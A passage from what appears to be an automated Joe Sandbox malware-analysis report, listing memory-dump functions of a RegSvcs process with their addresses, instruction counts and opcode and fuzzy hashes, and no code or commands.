                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction Fuzzy Hash: 44E08633111A1487D729DE18D511B7677E4FF45730F09463EA6134B784C674E544C794
                                                                          Function 01536AA4 Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction ID: 2c404b4774a8df434c625c5d78ef4c85693eed691e466799607a8c8807758c35
                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                          • Instruction Fuzzy Hash: E0D05E36511A50EFC7329F1BEA00D13BBF9FBD4A1070A062FA54583A20C670A806CBA0
                                                                          Function 0151E59C Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction ID: 3148fd14f95f1865afdfa8bdd3153509da1ba0bb1d7667851d9cfa6533fecca1
                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                          • Instruction Fuzzy Hash: 21D0A933204660ABDB72AA1DFC00FC333E8BB98760F06045EB008CB160C364AC81CA84
                                                                          Function 0155E908 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction ID: 1a01a3cb344480879e2da73bdbda0b4c448ca0f1751d4a1d2ed9ff7fd8e69474
                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                          • Instruction Fuzzy Hash: 65E08C329006809BCF52DF9AC650F4EFBF4FB94B00F150008A5086F220C334AD00CB40
                                                                          Function 014DA0E3 Relevance: .0, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction ID: 8d6927958299e6b5f34fa1e853d489fae722d93150fe70860cdfc481265a5d7f
                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                          • Instruction Fuzzy Hash: 04D0223331207193CF295A666820F676905AB80A90F2A002F350A93A20C0248C43C2E0
                                                                          Function 0151A830 Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction ID: 9225a92194804174032a42ca17113a8d689b753528dcdb15870866f28a107126
                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                          • Instruction Fuzzy Hash: FDD012371D054DBBCB119F66DC01F957BA9E764BA0F454025B604875A0C63AE950D584
                                                                          Function 0151CA24 Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 718a2801849d888d1e283bf872ac2b0801e474d88214f543f7bf630ea0dd66af
                                                                          • Instruction ID: 749f2c2022772a247e3c15dc8ff9e3be5849da2e410c43191d200b12083f2502
                                                                          • Opcode Fuzzy Hash: 718a2801849d888d1e283bf872ac2b0801e474d88214f543f7bf630ea0dd66af
                                                                          • Instruction Fuzzy Hash: A4D0A731545002CBEF27CF0AC520E2E3AB0FB10640F40006DEF4159520D325EC01C710
                                                                          Function 014F02A0 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction ID: 16a4e7098035fcea73ef08b31227c88240dbea341639a18f86850939151bdac1
                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                          • Instruction Fuzzy Hash: 1CD09239252A80CFD61A8B0CC5A4B1633A4BB84A44F860895E501CBB22D638D940CA10
                                                                          Function 0151C700 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction ID: a33d78e3832e0e9312470e8c96422ce28b9071507bc1ec9cefa3c6fe30eea4cc
                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction Fuzzy Hash: 67C08033150644AFC711DF95CD01F0177A9F7A8B40F010025F30447670C531FC10D644
                                                                          Function 01500310 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction ID: a20f732710adc345da54c64d7a809aeca6d2dfe6c6f867a2d578e3a86d24e88f
                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction Fuzzy Hash: 29D01236100249EFCB12DF85C890E9A772AFBD8750F108019FD190B650CA31ED62DA50
                                                                          Function 014E0750 Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction ID: b9e33bfeadf10a07ed4f3f6828503570d867cdd24ff5f76005168647c5612d34
                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction Fuzzy Hash: A0C04879701A468FDF16DF2AD294F4977E4FB94740F150894E905CBB22E624E802CA10
                                                                          Function 01524340 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65b87aeb3cd0620108c6212368f071dd6f328ea06e9ae16bd3343b814ec14d6e
                                                                          • Instruction ID: 8fb79574a29d9f1584ebb04fc75fbf363065cd942f477c7759e186d4e3e96628
                                                                          • Opcode Fuzzy Hash: 65b87aeb3cd0620108c6212368f071dd6f328ea06e9ae16bd3343b814ec14d6e
                                                                          • Instruction Fuzzy Hash: 81900231605800129144715848845464155B7E0311B59C511F0428A54CCA548A576361
                                                                          Function 01524650 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 982ef6b1478092c6cac1c042fea3153a46b5bdd48fb45a60cacf4164ef86c7aa
                                                                          • Instruction ID: 234fe5aded64c9876fa96885af54626f7d7fb8690da86f071451de8b9cd56120
                                                                          • Opcode Fuzzy Hash: 982ef6b1478092c6cac1c042fea3153a46b5bdd48fb45a60cacf4164ef86c7aa
                                                                          • Instruction Fuzzy Hash: A9900261601500424144715848044066155B7E1311399C615B0558A60CC6588956A369
                                                                          Function 01522BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37aae11ab5a6bfe1584e965d480c9e01acae54d32abc32029bedfc082c460877
                                                                          • Instruction ID: d4ac229f85b3d8d5da0d5411a5583bf189a9a5774a081817d888a44d836b598c
                                                                          • Opcode Fuzzy Hash: 37aae11ab5a6bfe1584e965d480c9e01acae54d32abc32029bedfc082c460877
                                                                          • Instruction Fuzzy Hash: CC90023120140802D1847158440464A0155A7D1311F99C515B0029B54DCA558B5A77A1
                                                                          Function 01522BE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ec073c353f207e310c25dc9864fd9ac31df94903d221d604f6d4e5b1fe60735
                                                                          • Instruction ID: c884fab5382d7fab6d13d60e2c859e7f654d05a622724adb1ea7d242c523e8ea
                                                                          • Opcode Fuzzy Hash: 9ec073c353f207e310c25dc9864fd9ac31df94903d221d604f6d4e5b1fe60735
                                                                          • Instruction Fuzzy Hash: DF90023120544842D14471584404A460165A7D0315F59C511B0068B94DD6658E56B761
                                                                          Function 01522B80 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2f7c6cbe5228ec8ed0ac8add4c1a9da8966c3dc31038e0506fd54d97e2fb290
                                                                          • Instruction ID: f6ad38c2c221d1034ab973476122497cb8250a66c63e440bcff338a05312b9b5
                                                                          • Opcode Fuzzy Hash: f2f7c6cbe5228ec8ed0ac8add4c1a9da8966c3dc31038e0506fd54d97e2fb290
                                                                          • Instruction Fuzzy Hash: 2590023120140802D108715848046860155A7D0311F59C511B6028B55ED6A589927231
                                                                          Function 01522BA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9dbc93bce8d6469caf9f5ac1ce423432a1ce7f66395178c5800e51eac1f173b4
                                                                          • Instruction ID: 4572c39914d0663d70f3c83cff5c4282eb0e019d23a4655ed3f9c6b8634a66cc
                                                                          • Opcode Fuzzy Hash: 9dbc93bce8d6469caf9f5ac1ce423432a1ce7f66395178c5800e51eac1f173b4
                                                                          • Instruction Fuzzy Hash: CF90023160540802D154715844147460155A7D0311F59C511B0028B54DC7958B5677A1
                                                                          Function 01522AD0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 701793f5dc0921798f4f402f41acebc429e1c051afcdd99ad4cc8e02e50e61d9
                                                                          • Instruction ID: 37dde6e875a1d2a17b0455a019d3537bf1858a34001f85d0ce15724924caeff7
                                                                          • Opcode Fuzzy Hash: 701793f5dc0921798f4f402f41acebc429e1c051afcdd99ad4cc8e02e50e61d9
                                                                          • Instruction Fuzzy Hash: B9900225211400030109B55807045070196A7D5361359C521F1019A50CD66189626221
                                                                          Function 01522AF0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e2b0fd8ba8ed3adb92412e3f0a42f560447a3f8c6a950cd55fd96a195f1b750
                                                                          • Instruction ID: c667f43edb5e3524fe1ef0585751d1ddff3a3f29d0af4cbb3185f2c975f1f0e6
                                                                          • Opcode Fuzzy Hash: 5e2b0fd8ba8ed3adb92412e3f0a42f560447a3f8c6a950cd55fd96a195f1b750
                                                                          • Instruction Fuzzy Hash: 68900225221400020149B558060450B0595B7D6361399C515F141AA90CC66189666321
                                                                          Function 01522AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dbd8b97a3534ad1e9ba2efddbd284bfe84e2b9c25f72fdeb23f689bad9efd5ea
                                                                          • Instruction ID: ae1aba14ac8b3c1332b750e41777b6c1aa242c0183afdebae9ff01fa9affd8b6
                                                                          • Opcode Fuzzy Hash: dbd8b97a3534ad1e9ba2efddbd284bfe84e2b9c25f72fdeb23f689bad9efd5ea
                                                                          • Instruction Fuzzy Hash: 2C9002A1201540924504B2588404B0A4655A7E0211B59C516F1058A60CC5658952A235
                                                                          Function 01522D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bda0a6787264d04bba0f1bfda73e7105ae4c069ad4b7a86b2739ddabab270aa1
                                                                          • Instruction ID: ba68329a68af2ece98114973d1b244af895d6e88eb4d6a499b1a81c28b989d9a
                                                                          • Opcode Fuzzy Hash: bda0a6787264d04bba0f1bfda73e7105ae4c069ad4b7a86b2739ddabab270aa1
                                                                          • Instruction Fuzzy Hash: D390022921340002D1847158540860A0155A7D1212F99D915B0019A58CC955896A6321
                                                                          Function 01522D00 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dfa6bc41bb23c2e144284a70415ac77ebb3b31560306c739474eabcd43f809c5
                                                                          • Instruction ID: b5a6d17c77643d948490a7b7ca7a8b81f9c39a2104b16786ec9b457f7ddbca1a
                                                                          • Opcode Fuzzy Hash: dfa6bc41bb23c2e144284a70415ac77ebb3b31560306c739474eabcd43f809c5
                                                                          • Instruction Fuzzy Hash: 5F90022120544442D10475585408A060155A7D0215F59D511B1068A95DC6758952B231
                                                                          Function 01522D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90c29d0409bbaca8c3d1ca0094d132fec10b880b32919785ccb39c2256f4e8d7
                                                                          • Instruction ID: ea3efe300956dc94796679577b127a41c8ad69291624fbdff4572bbd4a846eff
                                                                          • Opcode Fuzzy Hash: 90c29d0409bbaca8c3d1ca0094d132fec10b880b32919785ccb39c2256f4e8d7
                                                                          • Instruction Fuzzy Hash: 2990022130140003D144715854186064155F7E1311F59D511F0418A54CD95589576322
                                                                          Function 01522DD0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e6a54b8fdbb180a3b712b9d80da456aca8c269d27c001ebbf51f53bdb47f8ec7
                                                                          • Instruction ID: 3d6c31df3c4d8871d4c4977cf62dc230370cccea42eab069d7ec0b3de5d29a11
                                                                          • Opcode Fuzzy Hash: e6a54b8fdbb180a3b712b9d80da456aca8c269d27c001ebbf51f53bdb47f8ec7
                                                                          • Instruction Fuzzy Hash: FE900221242441525549B15844045074156B7E0251799C512B1418E50CC5669957E721
                                                                          Function 01522DB0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: faf6b11661e600b94c6bd2c7f148c5db0da9a882971012c02837bda26ce27bdd
                                                                          • Instruction ID: eddabcceee596b7b12b298d06b051b8fee44af64e7ffcd8874d86a0552d5d61b
                                                                          • Opcode Fuzzy Hash: faf6b11661e600b94c6bd2c7f148c5db0da9a882971012c02837bda26ce27bdd
                                                                          • Instruction Fuzzy Hash: 3790023124140402D145715844046060159B7D0251F99C512B0428A54EC6958B57BB61
                                                                          Function 01522C60 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 68a8a74e399aad76ce433ba726a1187b6554a6d3e6d0e9e4284e93489e5d008b
                                                                          • Instruction ID: 98e2dca736e17647830d82886195fde562ef66ea7f9ead41a95a3b49fcc1a907
                                                                          • Opcode Fuzzy Hash: 68a8a74e399aad76ce433ba726a1187b6554a6d3e6d0e9e4284e93489e5d008b
                                                                          • Instruction Fuzzy Hash: 1690023120140842D10471584404B460155A7E0311F59C516B0128B54DC655C9527621
                                                                          Function 01522CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b8fbdfa382611a5d9bd10a1032517e7223cfb63bad83909d74447d1b2eff0b8
                                                                          • Instruction ID: a649c0b5a6289605394cc7076eca27c61543138c727662ce16cb62206f5333e4
                                                                          • Opcode Fuzzy Hash: 3b8fbdfa382611a5d9bd10a1032517e7223cfb63bad83909d74447d1b2eff0b8
                                                                          • Instruction Fuzzy Hash: A090022160540402D144715854187060165A7D0211F59D511B0028A54DC6998B5677A1
                                                                          Function 01522CF0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 588ddc24895c823b086bdcdaef280cb24acec75b2fbb2333df9e787318769f25
                                                                          • Instruction ID: bd8f700e474abcb8e17374afa06025ec89444507dfe39d2a8ac0b42abda6e4a8
                                                                          • Opcode Fuzzy Hash: 588ddc24895c823b086bdcdaef280cb24acec75b2fbb2333df9e787318769f25
                                                                          • Instruction Fuzzy Hash: 6190023120140403D104715855087070155A7D0211F59D911B0428A58DD69689527221
                                                                          Function 01522CA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 62e44a1754c2a56eb5a07e30d59b7865d654430cc4df46274bffb677bc77777c
                                                                          • Instruction ID: 457bbd85b02096f8f2a6cee0d6440a9588d4218c45bac50965bc35d5b21684d9
                                                                          • Opcode Fuzzy Hash: 62e44a1754c2a56eb5a07e30d59b7865d654430cc4df46274bffb677bc77777c
                                                                          • Instruction Fuzzy Hash: CA90023120140402D104759854086460155A7E0311F59D511B5028A55EC6A589927231
                                                                          Function 01522F60 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b1f51543dcf96bdf6fff6bfa7dab4165ae8f86f8d1beb0c05f9164f4718d26c
                                                                          • Instruction ID: 65fade4e0fc6ece13757d08d2b434d3c7ed4e81f4192f0b3db510423506cebb7
                                                                          • Opcode Fuzzy Hash: 5b1f51543dcf96bdf6fff6bfa7dab4165ae8f86f8d1beb0c05f9164f4718d26c
                                                                          • Instruction Fuzzy Hash: 9390026121140042D108715844047060195A7E1211F59C512B2158A54CC5698D626225
                                                                          Function 01522F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95a869a7d94cc2b87a8ae87c2e21096991004452a9bbb76af20c70f243ab4a73
                                                                          • Instruction ID: 779cf234a956ccb46213875b955dfe5329f12fd0e0e1e2e88563ec1259588bce
                                                                          • Opcode Fuzzy Hash: 95a869a7d94cc2b87a8ae87c2e21096991004452a9bbb76af20c70f243ab4a73
                                                                          • Instruction Fuzzy Hash: 8D90026134140442D10471584414B060155E7E1311F59C515F1068A54DC659CD537226
                                                                          Function 01522FE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d4ac6f37baa47e3c22c11195a83e44c943a4de718797c801de5228c2ceddb3d3
                                                                          • Instruction ID: 0a4d7c7f579d4251caab45431b8172e0c2098cdee08eb73d2f3d9fd2b879e5fe
                                                                          • Opcode Fuzzy Hash: d4ac6f37baa47e3c22c11195a83e44c943a4de718797c801de5228c2ceddb3d3
                                                                          • Instruction Fuzzy Hash: 66900221211C0042D20475684C14B070155A7D0313F59C615B0158A54CC95589626621
                                                                          Function 01522F90 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
